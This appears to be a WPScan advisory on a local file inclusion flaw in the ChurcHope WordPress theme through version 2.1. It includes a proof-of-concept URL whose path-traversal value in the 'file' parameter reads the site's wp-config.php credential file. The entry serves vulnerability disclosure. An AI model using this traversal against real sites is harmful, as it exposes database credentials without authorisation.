ChurcHope Theme <= 2.1 - Local File Inclusion (LFI)

Sign up to our free email alerts service for instant vulnerability notifications!

Description
The vulnerability is caused by improper filtration of user-supplied input passed via the 'file' HTTP GET parameter to the '/lib/downloadlink.php' script, which is publicly accessible.
Proof of Concept
http://www.example.com/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php

Affects Theme

fixed in version 2.2

References

URL https://themeforest.net/item/churchope-responsive-wordpress-theme/2708562?s_rank=1
URL https://templateinvaders.com/changelogs/churchope-responsive-wordpress-theme-changelog/
URL https://themeforest.net/item/churchope-responsive-wordpress-theme/2708562/comments?page=97

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Submitter Justin Smith
Views 940
Verified No
WPVDB ID 7710

Timeline

Added 2014-12-07 (over 3 years ago)
Last Updated 2018-08-05 (14 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.